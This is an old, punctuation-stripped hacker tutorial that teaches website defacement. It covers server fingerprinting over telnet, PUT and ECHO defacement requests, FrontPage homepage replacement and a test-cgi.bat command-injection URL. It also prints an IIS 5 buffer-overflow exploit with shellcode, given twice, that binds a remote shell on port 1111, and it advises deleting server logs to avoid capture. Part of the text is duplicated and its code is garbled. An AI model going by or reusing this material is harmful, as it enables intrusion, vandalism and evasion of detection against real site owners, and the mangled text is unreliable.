Page 1
_____________________________________________________________________________________
___________________________________________
Defacing wbsites
_____________________________________________________________________________________
____________________________________________
Defacing Websites
Defacing websites is one of the most exciting in the IT
(Information Technology) as well as in the Underground World
(The Hackers World) Crackers Script Kiddies and Uberhackers
mount their path towards fame by defacing websites Well itrsquos not
always for fame websites are also defaced to spread message
among public There are many reasons for website defacement I
have seen hackers defacing websites juts for fun and amusement
Well in this article I will be explaining the involutions of website
defacement
Basically websites are defaced by exploiting the vulnerabilities in
the web server and gaining root shell injecting malicious coded
into the target page residing on the server In this tutorial I will
be explaining how to exploit the known vulnerabilities I will be
explaining some methods of exploiting the most vulnerable
Microsoft IIS server
Web Server Detection
I think defacing websites is not at all hacking For defacing
websites you have to search for exploits programming skill and
lot of time for trial and error
In every software website and web server there exists some
vulnerability (mistake in the mechanism of the program) by
exploiting these vulnerabilities one can get root (administrator
privilege) access to the system or the server running the
particular vulnerability After applying this method websites are
defaced You can find loads of recently discovered vulnerabilities
in sites like
wwwsecurityfocuscom
wwwpacketstormsecuritycom
These sites even offer the exploit code and the method of
exploitation
You can also discover new vulnerabilities in web servers and sites
through web security scanner
Tools of Trade
Nikto Security Scanner
Stealth HTTP Security Scanner
Acutenix Web Security Scanner
So before defacing websites you must know which sever
software is running by the target website After finding the server
software you will look for vulnerabilities and exploits for the
particular server software So finding the server software is very
essential
Web server detection is very easy and a very obvious method
Basically what happens is that when a request is sent to a web
server it is forced to generate a 400 Bad Request message or a
200 OK message or even 404 Forbidden error message in raw
mode that is through telnet Actually the web server responds
with the corresponding message which contains its web server
software as well as the server software version information
So what we need to do is just telnet the web server or website
into port 80 of a web server and send some request so that the
server responds with a 400 bad request error message or a 200
OK message which will contain the server software and server
software version information
NOTE Port 80 is the default HTTP port for web servers
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
GET HTTP11rnrn
Hostserver-software
ltentergt
ltentergt
ltentergt
HTTP11 403 Forbidden
Date Fri 17 Mar 2006 130020 GMT
Server Apache1322 (Win32)
Connection close
Content-Type texthtml charset=iso-8859-1
ltDOCTYPE HTML PUBLIC -IETFDTD HTML 20ENgt
ltHTMLgtltHEADgt
ltTITLEgt403 Forbidd
enltTITLEgt
ltHEADgtltBODYgt
ltH1gtForbiddenltH1gt
You dont have permission to access
on
this serverltPgt
ltHRgt
ltADDRESSgtApache1322 Server at wwwapacheorg
Port 80ltADD
RESSgt
ltBODYgtltHTMLgt
Connection to host lost
I have telnetted wwwhackingtheworldilitehostcom into port 80
so I get the above figure in my command prompt
Okay I hope you have figured out what I mean It is mere telnet
response Okay I will tell you what to do you have to telnet a web
server or website into port 80
NOTE I have telnetted the domain name you can telnet the IP
address also
So after telnetting the web server name or the website you will
get a blank screen So in the blank screen type in some requests
like GET HTTP11rnrn then type something like
Hostserver-software then press ltentergt quite a few times until
you get the serverrsquos response The server will respond with its
software information
Examining the Web Server
If you are using Microsoft IIS (Internet Information service) then
you must have noticed that the default installation contains the
website root in CInetpubwwwroot Basically all the directories
of server softwares are called as virtual directories Actually in a
web server each virtual directory is provided with different type
of permissions Permissions like Read Write Execution of Scripts
and Execution of Executable like Dll and server side pages like
ASP CGI etc
Now I am going to describe the methods of analyzing the
directory permission of a virtual directory residing in a web server
READ ACCESS
Whenever you visit a website through your web browser you type
in the domain name Do you know what happens when you type in
the domain name Actually when you type in the domain name
and press enter you are connected to port 80 (HTTP port) of the
IP address linked with the domain name
For Example
You type in wwwhackingtheworldilitehostcom in your web
browserrsquos address bar The IP (Internet Protocol) address of this
site is 7229654 so as soon as you press enter the URL
(Uniform Resource Locator) is redirects the IP address to
7229654indexhtml indexphp indexasp indexjsp or
whatever the index page is configured in the web server Now
once you press enter you will be redirected to Hacking the
Worldrsquos official website In the website you will be able to read
contents from its wwwroot If the wwwroot directory contains
ASP PHP or JSP then those server side pages are executed and
HTML is generated and passed to the browser (client) by IIS
(server) or any web server dynamically When you are able to read
a document from a given directory then it signals that the
directory is readable Normally it has been seen that directories
containing databases files are forbidden with read access for
security reasons
WRITE ACCESS
I will explain HTTP protocol concisely before going to Write
Access Well HTTP is a component of TCPIP stack It was
configured and formulated with the connotation of sharing files
across the Internet HTTP is the acronym of Hyper Text Transfer
Protocol The name itself indicates the description Files can be
uploaded to the server and downloaded from the server through
the HTTP protocol
NOTE Files can be uploaded to the server and downloaded from
the server through the HTTP protocol without the need of any type
of authentication
Well this was technique was employed and executed years ago
Soon computer enthusiaists realized that this kind of technique
was a huge security threat So they developed new techniques to
subdue the security threat Nowadays web servers are designed
and configured as such to give write access to only selected virtual
directories
TIP Try telnetting a web server and find out some good
information about the server and its behavior
Now I am going to explain some commonly used commands
supported by a web server
GET It is used to send requests for read access to a file residing
on the server by the browser (client)
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
GET indexhtml HTTP11rnrn
Sidetrack The HTML (Hyper text markup language) source code of
indexhtml page occupying on the server will be regressed or if
requested for ASP or PHP or any server side executable page then
the dynamically generated HTML page will be shown
DEL This is a command for deleting files on the web server This
command requires write access on the assigned virtual directory
where the file is to be deleted
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
del indexhtml HTTP11rnrn
Sidetrack Most probably you will get a 403 Forbidden Error as it
is quiet obvious that the wwwroot directory will never have a
write access
PUT It is used to create files on the server it necessitates write
access on the particular virtual directory where the file is to be
created
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
PUT cctxt HTTP11rnrn
Sidetrack Most probably you will get a 403 Forbidden Error as it
is quiet obvious that the wwwroot directory will never have a
write access
ECHO The publishing tool it is the same command used in DOS
(Disk Operating System) Batch Files The output can be redirected
Microsoft Telnetgt wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
ECHO Site defaced by SB gtgt indexhtml HTTP11rnrn
TIP SB is the acronym of my name Shubham Bhattacharya
When you are defacing a site you can also use acronyms of your
name
PROPFIND Propfind is used as a request for directory surfing
NOTE In IIS server it is used as an administrative tool for web
server analysis
Microsoft Telnetgt wwwhackingtheworldilitehostcom 80
Connected to wwwhackingtheworldilitehostcom
PROPFIND HTTP11
Hostiis-server
Content-Length0
Sidetrack You will definitely get a 403 Forbidden Error as it is
quiet evident that the wwwroot will never have a write access
Well you must be wondering how you can test write access
permission for a particular directory in IIS server
To test the write access permission for a particular directory in IIS
server follow the steps given below
- To test if write access permission is enabled for anonymous web
clients then telnet the web server or the website in port 80 and
make the following request
PUT scriptshtwasp HTTP11
Host iis-server
Content-Length 10 ltentergtltentergt
Once you make the following request the server should respond
with a 100 Continue Message
HTTP11 100 Continue
Server Microsoft-IIS50
Date Sun 17 Feb 2006 105300 GMT
On receiving the above type 10 letters
XXXXXXXXXX
HTTP11 201 Created
Server Microsoft-IIS50
Date Sun 17 Feb 2006 105608 GMT
Location httpiis-serverdirmy_filetxt
Content-Length 0
Allow OPTIONS TRACE GET HEAD DELETE PUT COPY
MOVE PROPFIND PROPPATCH SEARCH LOCK UNLOCK
If the server responds with this 201 Created response then the
write permission is enabled
EXECUTION ACCESS
Server side pages like ASP PHP JSP or DLL are used in highly
advanced database driven dynamic websites which dynamically
generates the HTML and sends it to the client (web browser)
These server side pages and other executables including DLL and
EXE files needs execution perquisites in the virtual directory
where they are kept
NOTE DLL EXE etc need execution perquisites they are kept in a
single virtual directory
DIRECTORY SURFING
It has been often seen that web servers to be more specific
virtual directories of web servers are configured as such to
provide directory surfing access to all clients or special clients
through proper authentications Actually directory browsing
means that you can list the file and folders present in your virtual
directory just as you see in your standalone system Well most of
the web server administrators turn off this feature But exploit
codes can be used to get directory listing of the virtual directory
EXPLOIT FOR DIRECTORY LISTING IN APACHE
Well if you are not familiar with apache then let me give you a
brief description Apache is a server in which you have to
configure your web server using command and scripts These
scripts and commands are kept in httpdconf file in capache
groupapacheconf folder default Apache installation on a
distinctive windows system This file contains all the settings of
the web server and if we get our hands into this file then we get
to know all the settings of the web server including the location of
log files directory permissions write access authentication levels
etc
So now letrsquos get on with the exploit As we know that Apache is
the most preferred web server This web server has a bat in its
cgi-bin directory This bat file is named as test-cgibat Actually
the motive of the bat file is to test the privileges of cgi-bin
directory
NOTE cgi-bin directory contains all the CGI and Perl scripts
Well it is quiet obvious that cgi-bin virtual directory has execution
permissions These conditions are exploited to perform out
pernicious attacks The bat file in Apache web server is called as
execution of DOS (Disk Operating Systems) The DOS shell is
spawned to it for execution Now we can use | (pipe) character
along with the batch file to execute commands on the remote
server
NOTE If you donrsquot know how to put the | (pipe) character then
donrsquot worry To put the pipe character press Alt+ the
character is just beside your backspace key
So the attack URL will be like this
httpwwwtargetcomcgi-bintest-cgibat|copy+confhttpd
conf+htdocshttpdconf
Through the above URL I have copied the httpdconf file from the
conf directory The conf directory mostly does not have read
access to the Apache web root that is htdocs virtual folder Now
we can easily download the httpdconf file using the following
URL
httptargetcomhttpdconf
Since it occupies in the Apache web root Through this method
you will get the httpdconf file and through the httpdconf file you
can get some worthful information about the web server
Inspecting known vulnerabilities
Generally websites are defaced and hacked using vulnerabilities
related with the server software or the Operating System running
the server software Well most of the lsquohackersrsquo deface websites
using vulnerabilities Please note I am talking about hackers not
script kiddies who deface websites using uncanny softwares So
you must know what vulnerability is well if you donrsquot know then
let me tell you all Vulnerability is an existing flaw or defect in the
software architecture which allows a hacker or cracker to take
control over the system or issue capricious system commands to
the server In every software or application or tool vulnerabilities
persist
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
The above sites contain latest vulnerabilities with exploit codes
Even if you are an elite or a professional you will find the
information useful
Working with Exploits
Well I must say this is the most exciting part of this tutorial
Okay so wwwvictimcom is the target site Well through the
above methods I mean the methods I have explained earlier in
the tutorial through those methods we have found out that the
website is functioning in Microsoft IIS server software So it is
time to find some vulnerability I am using Acutenix Web Security
Scanner to scan for vulnerabilities You guys must know
programming languages like Perl or Socket Programming or C this
is essential because through this you will be able to compile the
exploits So once you get vulnerability try exploiting it by
executing it in your client (browser)
MICROSOFT FRONPAGE EXTENSION EXPLOIT
This is one of the methods for website defacement using Microsoft
Web Publishing Wizard Using this method one can deface
Websites having FrontPage Server extensions By using Microsoft
Web Publishing Wizard one can replace FrontPage Server
extension pages
Follow the steps given below to execute the following exploit
Telnet the Target website or web server in port 80
CTelnet wwwvictimcom 80
You will get a blank screen type GET and continue pressing
enter till the web server responds to your requests
GET ltENTERgtltENTERgt
NOTE Web servers functioning in IIS server have FrontPage
Extensions enabled by default
So After pressing enter you will get the following
HTTP11 400 Bad Request
Server Microsoft-IIS50
Date Thu 17 Feb 2006 041845 GMT
Content-Type texthtml
Content-Length 87
Once you get the HTTP Bad Request you have search for the
homepage Most of the sites have the default homepage as
httpwwwvictimservercommainasp
httpwwwvictimservercomindexhtml
httpwwwvictimservercomindexhtm
httpwwwvictimservercomindexasp
httpwwwvictimservercommainhtm
httpwwwvictimservercommainhtm
httpwwwvictimservercomdefaulthtm
httpwwwvictimservercomdefaultasp
httpwwwvictimservercomdefaulthtml
Keep assaying all possible FrontPage Extensions unless the page
loads If the extension doesnrsquot exist then it will give a 404 Error
Let us say you have got the homepage as
wwwvictimcomindexhtml so design the page which you want
upload or modify the homepage Here the homepage is indexhtml
once you design the page or modify the page save it as
indexhtml
Now open Web Publishing Wizard and follow the steps given
below
- Open Microsoft Web Publishing Wizard
- Now browse the file that you are going to upload Here
indexhtml is the file which we are going to upload
- Now you get a screen where you have to name the web server
Type in anything and click on Advanced
- Select the service provider from the drop down box This is
nothing but the kind of uploading it is going to do Since your
motive is to deface the site select the FrontPage Extended Web
option since this method of defacing works only for FrontPage
enabled sites
- Type the URL of the victim server homepage and in the given
box here it is wwwvictimcomindexhtml
- Here specify the URL that you type in the Web browser to access
the victim server website
- Select the connection method that you use to access the internet
- Click Finish Voila you have successfully replaced the victimrsquos
homepage with yours
Overworking known vulnerabilities to break into a server
Before going deep into vulnerabilities you must know some
coding exploits I am going to present some exploit codes written
in the most powerful programming language C
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
use MS VC++ to compile this piece of code
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
The above code is called as an exploit code these are written in
powerful programming languages like C Perl or sometimes JAVA
Exploit Codes are written according to the vulnerability
Vulnerabilities were discovered in the past nowadays it has been
seen that server softwares and operating systems are patched for
these vulnerabilities So you canrsquot just execute exploit code to
break into a server you must overwork an exploit code so that it
works according to your needs One more thing I must mention is
that you must keep yourself updated with latest vulnerabilities by
visiting the sites that I have mentioned earlier in the tutorial
Well I think its better that you code your own exploit code in Perl
or C in order to break into websites
NOTE I am talking about high profile websites I am not talking
about lame websites coded in notepad
Keeping yourself safe
Well you must be familiar with server softwares like Apache
Microsoft IIS etc So you must be knowing about the log files
which records each and every request made by the server As it
records everything system administrators will have no problem
catching the malicious cracker or script kiddie as the log file will
have the IP (Internet Protocol) address and through the IP
address you can trace the cracker or the script kiddie
NOTE Read my tutorial on Gathering Information of Remote Host
TIP If you do not want to get busted you must clear the log files
after you break into a web server
CLEARING LOGS
You must clear yoursquore the logs in order to save yourself from
getting busted So you can use cross site scripting vulnerability
to clear the log files You can do by executing the following URL
httpwwwtargetcomcgi-bintest-cgibat|DEL+log
NOTE The above URL can be used in Apache server software
In case of IIS on Windows 2000 you can use the following method
to get a DOS Shell through telnet
The Following code exploits a buffer overflow in IIS 5 on Windows
2000 server and opens port 1111 and binds a shell to it If the
exploit is successful then all you have to do is use telnet to
connect to port 1111 of target and the system is yours
Windows 2000 Server Exploit By CHINANSL Security Team
Test on Windows 2000 Chinese Version IIS 50 not patched
WarningTHIS PROGRAM WILL ONLY TEST
CHINANSL Technology COLTD httpwwwchinanslcom
kejichinanslcom
include stdafxh
include ltstdiohgt
include ltstdlibhgt
include ltstringhgt
include ltwindowshgt
pragma comment (libWs2_32)
int main(int argc char argv[])
if(argc = 4)
printf(s ip port aspfilepathnnargv[0])
printf( ie s 127001 80 iisstartaspnargv[0])
puts( programed by kejichinanslcom)
return 0
DWORD srcdata=0x01e2fb1c-40x00457474
address of SHELLCODE
DWORD jmpaddr=0x00457494 0x77ebf094 0x01e6fcec
x1cxfbxe6x01 x0cxfbxe6x01
char destIP=argv[1]
char destFile=argv[3]
int webport=atoi(argv[2])
char pad=xccxccxccxcc ADPA x02x02x02x02 PADP 16 bytes
WSADATA ws
SOCKET s
long result=0
if(WSAStartup(0x0101ampws) = 0)
puts(WSAStartup() error)
return -1
struct sockaddr_in addr
addrsin_family=AF_INET
addrsin_port=htons(webport)
addrsin_addrs_addr=inet_addr(destIP)
s=socket(AF_INETSOCK_STREAM0)
if(s==-1)
puts(Socket create error)
return -1
if(connect(s(struct sockaddr )ampaddrsizeof(addr)) == -1)
puts(Cannot connect to the specified host)
return -1
char buff[4096]
char
shellcode=x55x8bxecx33xc0xb0xf0xf7xd8x03xe0x8bxfcx33xc9x8
9
x8dx2cxffxffxffxb8x6bx65x72x6exabxb8x65x6cx33x32
xabx32xc0xaaxb8x77x73x6fx63xabxb8x6bx33x32x2exab
x4fx32xc0xaax8dx7dx80xb8x63x6dx64x2exabx32xc0x4f
xaaxb8x23x80xe7x77x8dx9dx10xffxffxffx53xffxd0x89
x45xfcxb8x23x80xe7x77x8dx9dx19xffxffxffx53xffxd0
x89x45xf8xbbx4bx56xe7x77x6ax47xffx75xfcxffxd3x89
x45xf4x6ax48xffx75xfcxffxd3x89x45xf0x33xf6x66xbe
x1dx02x56xffx75xfcxffxd3x89x45xecx66xbex3ex02x56
xffx75xfcxffxd3x89x45xe8x66xbex0fx03x56xffx75xfc
xffxd3x89x45xe4x66xbex9dx01x56xffx75xfcxffxd3x89
x85x34xffxffxffx66xbexc4x02x56xffx75xfcxffxd3x89
x85x28xffxffxffx33xc0xb0x8dx50xffx75xfcxffxd3x89
x85x18xffxffxffx6ax73xffx75xf8xffxd3x89x45xe0x6a
x17xffx75xf8xffxd3x89x45xdcx6ax02xffx75xf8xffxd3
x89x45xd8x33xc0xb0x0ex48x50xffx75xf8xffxd3x89x45
xd4x6ax01xffx75xf8xffxd3x89x45xd0x6ax13xffx75xf8
xffxd3x89x45xccx6ax10xffx75xf8xffxd3x89x45xc8x6a
x03xffx75xf8xffxd3x89x85x1cxffxffxffx8dx7dxa0x32
xe4xb0x02x66xabx66xb8x04x57x66xabx33xc0xabxf7xd0
xabxabx8dx7dx8cx33xc0xb0x0exfexc8xfexc8xabx33xc0
xabx40xabx8dx45xb0x50x33xc0x66xb8x01x01x50xffx55
xe0x33xc0x50x6ax01x6ax02xffx55xdcx89x45xc4x6ax10
x8dx45xa0x50xffx75xc4xffx55xd8x6ax01xffx75xc4xff
x55xd4x33xc0x50x50xffx75xc4xffx55xd0x89x45xc0x33
xffx57x8dx45x8cx50x8dx45x98x50x8dx45x9cx50xffx55
xf4x33xffx57x8dx45x8cx50x8dx45x90x50x8dx45x94x50
xffx55xf4xfcx8dxbdx38xffxffxffx33xc9xb1x44x32xc0
xf3xaax8dxbdx38xffxffxffx33xc0x66xb8x01x01x89x47
x2cx8bx45x94x89x47x38x8bx45x98x89x47x40x89x47x3c
xb8xf0xffxffxffx33xdbx03xe0x8bxc4x50x8dx85x38xff
xffxffx50x53x53x53x6ax01x53x53x8dx4dx80x51x53xff
x55xf0x33xc0xb4x04x50x6ax40xffx95x34xffxffxffx89
x85x30xffxffxffx90x33xdbx53x8dx85x2cxffxffxffx50
x53x53x53xffx75x9cxffx55xecx8bx85x2cxffxffxffx85
xc0x74x49x33xdbx53xb7x04x8dx85x2cxffxffxffx50x53
xffxb5x30xffxffxffxffx75x9cxffx55xe8x85xc0x74x6d
x33xc0x50xffxb5x2cxffxffxffxffxb5x30xffxffxffxff
x75xc0xffx55xccx83xf8xffx74x53xebx10x90x90x90x90
x90x90x6ax32xffx95x28xffxffxffxebx99x90x90x33xc0
x50xb4x04x50xffxb5x30xffxffxffxffx75xc0xffx55xc8
x83xf8xffx74x28x89x85x2cxffxffxffx33xc0x50x8dx85
x2cxffxffxffx50xffxb5x2cxffxffxffxffxb5x30xffxff
xffxffx75x90xffx55xe4x85xc0x74x02xebxb4xffx75xc4
xffx95x1cxffxffxffxffx75xc0xffx95x1cxffxffxffx6a
xffxffx95x18xffxffxff
char s1=POST HTTP11rn
char s2=Accept rn
char s4=Content-Type applicationx-www-
form-urlencodedrn
char s5=Transfer-Encoding
chunkedrnrn
char sc=0rnrnrn
char shellcodebuff[10248]
memset(shellcodebuff0x90sizeof
(shellcodebuff))
memcpy(ampshellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1]shellcodestrlen(shellcode))
shellcodebuff[sizeof(shellcodebuff)-1] = 0
char sendbuff[102416]
memset(sendbuff0102416)
sprintf(sendbuffsss HTTP11rnsHost
srnss10rnsrn4rnAAAArn4rnBBBBrns s1 destFile
shellcodebuff s2 destIP s4s 5 padsrcdatajmpaddr sc)
int sendlen=strlen(sendbuff)
(DWORD )strstr(sendbuffBBBB) = jmpaddr
(DWORD )strstr(sendbuffAAAA) = srcdata
result=send(ssendbuffsendlen0)
if(result == -1 )
puts(Send shellcode error)
return -1
memset(buff04096)
result=recv(sbuffsizeof(buff)0)
if(strstr(bufflthtmlgt) = NULL)
shutdown(s0)
closesocket(s)
puts(Send shellcode errorTry again)
return -1
shutdown(s0)
closesocket(s)
printf(nUse lttelnet s 1111gt to connect to the hostndestIP)
puts(If you cannot connect to the hosttry run this program again)
return 0
IMPLEMENTATION OF THE CODE
To implement the C code you must compile it and run Now you
must be wondering what is the use of this code Actually the C
code causes an overflow in IIS on Windows 2000 and commands
the system to bind a shell to the source Ip on port 1111 So once
the exploit works there will be a shell bind on port 1111 on the
target system To workout you must telnet the target IP into port
1111 through this you will be connected to the system without
any kind of authentication
Various Security Measures
Website defacement has become a terrible problem for IT
(Information Technology) based companies Everyday thousands
of websites are defaced Well even Government websites are
defaced for different reasons the most common reason is cyber
war Like in reality there are wars between two rival countries
similarly in wired world there are cyber wars
If you want to see the web attack archive visit the following site
httpdefacedalldasorg
Now some security measures for the system administrators
- First of all you must coordinate and organize your web root
with suitable directories What I mean to say is that you must
organize your files like images in an image directory one for
server side contents and so on so forth If you donrsquot configure your
web root properly then your web server will be prone to many
attacks
- You must be aware of the latest vulnerabilities visit these sites
httpwwwsecurityfocuscom
httpwwwpacketstormorg
httpwwwguininskicom
httpwwwinsecureorg
httpwwwsecuriteamcom
httpwwwslashdotorg
httpwwwtechnotroniccom
Well every web server is vulnerable but you must not fear you
must download the latest patches for the particular vulnerability
Well the last thing is that you must be able to predict the moves
of a malicious cracker or a script kiddie You need to know how a
cracker breaks into your site or web server you need to know the
motive behind the attack and you must think act and work like a
hacker and take the cracker out from the root
So this completes my tutorial on Defacing websites I hope you
have understood the involutions of web servers
Edit By S433D_ONLY_LINUX AND HACKFIRE TEAM
Page 2
wwwsecurityfocuscom
wwwpacketstormsecuritycom
These sites even offer the exploit code and the method of
exploitation
You can also discover new vulnerabilities in web servers and sites
through web security scanner
Tools of Trade
Nikto Security Scanner
Stealth HTTP Security Scanner
Acutenix Web Security Scanner
So before defacing websites you must know which sever
software is running by the target website After finding the server
software you will look for vulnerabilities and exploits for the
particular server software So finding the server software is very
essential
Web server detection is very easy and a very obvious method
Basically what happens is that when a request is sent to a web
server it is forced to generate a 400 Bad Request message or a
200 OK message or even 404 Forbidden error message in raw
mode that is through telnet Actually the web server responds
with the corresponding message which contains its web server
software as well as the server software version information
So what we need to do is just telnet the web server or website
into port 80 of a web server and send some request so that the
server responds with a 400 bad request error message or a 200
OK message which will contain the server software and server
software version information
NOTE Port 80 is the default HTTP port for web servers
Microsoft Telnetgttelnet wwwhackingtheworldilitehostcom 80
GET HTTP11rnrn
Hostserver-software
ltentergt
ltentergt
ltentergt
HTTP11 403 Forbidden
Date Fri 17 Mar 2006 130020 GMT
Server Apache1322 (Win32)
Connection close
Content-Type texthtml charset=iso-8859-1
ltDOCTYPE HTML PUBLIC -IETFDTD HTML 20ENgt
ltHTMLgtltHEADgt
ltTITLEgt403 Forbidd
enltTITLEgt
ltHEADgtltBODYgt
ltH1gtForbiddenltH1gt
You dont have permission to access
on
this serverltPgt
ltHRgt
ltADDRESSgtApache1322 Server at wwwapacheorg
Port 80ltADD
RESSgt
ltBODYgtltHTMLgt
Connection to host lost
I have telnetted wwwhackingtheworldilitehostcom into port 80
so I get the above figure in my command prompt
Okay I hope you have figured out what I mean It is mere telnet
response Okay I will tell you what to do you have to telnet a web
server or website into port 80
NOTE I have telnetted the domain name you can telnet the IP
address also
So after telnetting the web server name or the website you will
get a blank screen So in the blank screen type in some requests
like GET HTTP11rnrn then type something like
Hostserver-software then press ltentergt quite a few times until
you get the serverrsquos response The server will respond with its
software information
Examining the Web Server
If you are using Microsoft IIS (Internet Information service) then
you must have noticed that the default installation contains the
website root in CInetpubwwwroot Basically all the directories
of server softwares are called as virtual directories Actually in a
web server each virtual directory is provided with different type
of permissions Permissions like Read Write Execution of Scripts
and Execution of Executable like Dll and server side pages like
ASP CGI etc
Now I am going to describe the methods of analyzing the
directory permission of a virtual directory residing in a web server
READ ACCESS
Whenever you visit a website through your web browser you type
in the domain name Do you know what happens when you type in
the domain name Actually when you type in the domain name
and press enter you are connected to port 80 (HTTP port) of the
IP address linked with the domain name
For Example
You type in wwwhackingtheworldilitehostcom in your web
browserrsquos address bar The IP (Internet Protocol) address of this
site is 7229654 so as soon as you press enter the URL
(Uniform Resource Locator) is redirects the IP address to
7229654indexhtml indexphp indexasp indexjsp or
whatever the index page is configured in the web server Now
once you press enter you will be redirected to Hacking the
Worldrsquos official website In the website you will be able to read
contents from its wwwroot If the wwwroot directory contains
ASP PHP or JSP then those server side pages are executed and
HTML is generated and passed to the browser (client) by IIS
